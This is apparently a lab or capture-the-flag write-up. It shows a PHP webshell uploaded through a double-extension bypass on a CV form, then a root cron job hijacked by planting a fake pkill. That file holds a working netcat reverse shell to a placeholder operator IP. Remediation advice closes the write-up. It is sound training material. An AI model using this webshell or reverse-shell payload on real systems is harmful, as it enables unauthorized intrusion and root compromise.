Case file

Double-extension upload webshell and cron PATH hijack

Foundations Linux engagement: CV upload accepted shell.pdf.php; webshell as www-data; .bash_history and cron.d/persistence showed a relative pkill — planting ~/bin/pkill caught the next root cron for a reverse shell.

Foundations26 minLinux · File Upload · Webshell · Privilege Escalation
  • upload.php accepted a double-extension PHP shell under /cvs/. History and cron revealed a persistence job calling bare pkill; PATH plant returned root.

  • shell.pdf.php under /cvs/ executed whoami and read user.txt.

  • Planted ~/bin/pkill; persistence cron delivered a root reverse shell.

01

Engagement summary

upload.php accepted a double-extension PHP shell under /cvs/. History and cron revealed a persistence job calling bare pkill; PATH plant returned root.

HACKER VS HACKER was a recruitment site already under attacker control. Gobuster found /upload.php. A polyglot shell.pdf.php landed in /cvs/ and executed as the web user (?cmd=). Reading /home/lachlan/.bash_history and /etc/cron.d/persistence showed root periodically running pkill without an absolute path while lachlan’s PATH preferred ~/bin. Writing a reverse-shell script to /home/lachlan/bin/pkill and waiting for cron yielded a root shell.

Business impact

Extension-only upload filters are trivial to bypass. Relative binaries in root cron under a user-writable PATH are scheduled root RCE. Validate content-type and magic bytes, store uploads outside the webroot, and use absolute paths in privileged cron.

02

Double-extension webshell

shell.pdf.php under /cvs/ executed whoami and read user.txt.

OPERATOR · UPLOAD

savvy@lab:~$ gobuster dir -u http://10.10.10.50 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt

/upload.php /cvs/

savvy@lab:~$ # upload shell.pdf.php via CV form

savvy@lab:~$ curl -s 'http://10.10.10.50/cvs/shell.pdf.php?cmd=whoami'

www-data

savvy@lab:~$ curl -s 'http://10.10.10.50/cvs/shell.pdf.php?cmd=cat+/home/lachlan/user.txt'

03

Cron PATH hijack of pkill

Planted ~/bin/pkill; persistence cron delivered a root reverse shell.

PAYLOAD

~/bin/pkill

#!/bin/bash
rm -f /tmp/f; mkfifo /tmp/f
cat /tmp/f | /bin/sh -i 2>&1 | nc OPERATOR_IP 1234 >/tmp/f

OPERATOR · ROOT

savvy@lab:~$ curl -s 'http://10.10.10.50/cvs/shell.pdf.php?cmd=cat+/etc/cron.d/persistence'

# root job invokes relative pkill

savvy@lab:~$ nc -lvnp 1234

root@lab:~# id

uid=0(root) gid=0(root) groups=0(root)

Remediation

Rewrite cron to /usr/bin/pkill; remove user-writable dirs from root PATH. Quarantine upload directories; scan and block double extensions.